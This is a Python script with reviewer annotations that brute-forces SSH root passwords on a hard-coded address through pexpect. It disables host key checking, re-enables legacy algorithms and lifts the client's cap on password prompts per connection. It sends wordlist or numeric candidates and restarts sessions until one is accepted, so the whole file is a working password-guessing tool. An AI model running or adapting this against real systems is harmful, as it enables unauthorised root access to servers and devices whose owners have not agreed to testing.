# Sends candidate passwords, one after another, to the password prompt of a
# single `ssh` session driven through pexpect, and starts a new session
# whenever the current one ends without a match.
#
# Candidates come from the file named in sys.argv[1] (one per line) or, when
# no argument is given, from the strings "0" .. "99".
# Exit status: 0 when a candidate is reported as found (also on --help and on
# Ctrl-C), 1 when the whole list was sent without a match.
import sys
try:
    import pexpect
except:
    # NOTE(review): bare except, so any failure while importing pexpect
    # (not only a missing package) produces this message.
    print("Please install pexpect: pip install pexpect")
    exit()
import time

# Client command line. What each option contributes:
#   StrictHostKeyChecking=no / UserKnownHostsFile=/dev/null
#       the server's host key is accepted without verification and never
#       recorded, so the client does not authenticate the server.
#   KexAlgorithms=+diffie-hellman-group1-sha1, HostKeyAlgorithms=+ssh-dss,
#   PubkeyAcceptedKeyTypes=+ssh-dss
#       append legacy algorithms to the client's accepted set; recent OpenSSH
#       releases leave these disabled by default.
#   NumberOfPasswordPrompts=100000
#       raises the client's own cap on password prompts per connection, which
#       leaves the server's limit (e.g. OpenSSH sshd's MaxAuthTries) as the
#       only per-connection bound on attempts.
# The account and address (root@192.168.0.1) are hard-coded.
# NOTE(review): presumably the peer is a legacy or embedded SSH server, given
# the algorithms enabled here; the file does not say so.
sshcmd = ("ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "
          "-o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-dss"
          " -o PubkeyAcceptedKeyTypes=+ssh-dss -o NumberOfPasswordPrompts=100000 "
          "root@192.168.0.1")
          # "root@127.0.0.1 -p 2222")


def tryPasses(passes: list[str]) -> tuple[int, bool]:
    """Send the entries of *passes* to one ssh session until it ends.

    Args:
        passes: candidate passwords; each is stripped of surrounding
            whitespace before being sent.

    Returns:
        ``(i, found)``. ``i`` is the index within *passes* of the last
        candidate sent (``0`` for an empty list). ``found`` is True only
        when the output after a candidate matched the ``closed\\.`` pattern.

    Raises:
        Whatever ``pexpect`` raises from ``spawn``/``expect`` (for example on
        timeout); the caller catches these and retries.
    """
    if len(passes)==0:return 0,False
    # One ssh child per call. NOTE(review): the child is never closed
    # explicitly in this function.
    child = pexpect.spawn(sshcmd,encoding="utf-8")
    # child.logfile=sys.stdout
    for i,e in enumerate(passes):
        child.expect('password:')
        child.sendline(e.strip())
        # The strings below are regular expressions; the returned index says
        # which one matched:
        #   0  "closed\."    -> treated as a successful login
        #   1  "again."      -> rejected, another prompt follows
        #   2  EOF           -> the ssh process ended
        #   3  "(password)." -> treated as a final rejection
        #   4  "port 22"     -> treated as a connection-level message
        # NOTE(review): as a regex, "(password)." is a group followed by any
        # character, so it also matches the text "password:" - confirm that
        # a literal "(password)." was not intended.
        index=child.expect([ r"closed\.", "again.", pexpect.EOF, "(password).", "port 22"])
        if index==0:
            print("Found: ",e)
            return i,True
        if index==1:continue
        if index in [2,3,4]:return i,False
        # The previous line looks wrong, but if the last password attempt is correct,
        # the server still lets the user in (then kicks out)
    return i,False


# idx is the position in `passes` of the next candidate that has not been sent.
idx=0
passes=[]
if "--help" in sys.argv:
    print(f"""Usage: {sys.argv[0]} [path-to-passwordlist] If password list is not given, uses the numbers from 0 to 99.""")
    exit(0)
if len(sys.argv)==1:
    print("No password list given, using integers from 0 to 99")
    for i in range(100):
        passes.append(str(i))
else:
    print("Loading password list...")
    # readlines() keeps the trailing newline; tryPasses strips each entry.
    with open(sys.argv[1]) as f:
        passes=f.readlines()
# This assignment is overwritten at the top of the loop before it is read.
rpasses=passes[idx:]
print("Trying passwords...")
while idx < len(passes):
    # Each iteration opens a fresh session on the part of the list that is
    # still unsent.
    rpasses=passes[idx:]
    res=-1,False
    try:
        res=tryPasses(rpasses)
    except KeyboardInterrupt:
        exit(0)
    except Exception as e:
        # res[0] == -1 makes `idx += res[0] + 1` add zero, so the same slice
        # is retried after the one-second pause.
        res=-1,False
        print("""WARNING: An attempt failed. If running 3 or more processes this is normal. Waiting 1 second. Error:""",e)
        time.sleep(1)
    # print("currently on:",idx)
    #print(res)
    if res[1]:
        exit(0)
        # Unreachable: exit(0) above already terminates the process.
        break
    else:
        # Skip past every candidate sent during this session.
        idx+=res[0]+1
print("Password not in list")
exit(1)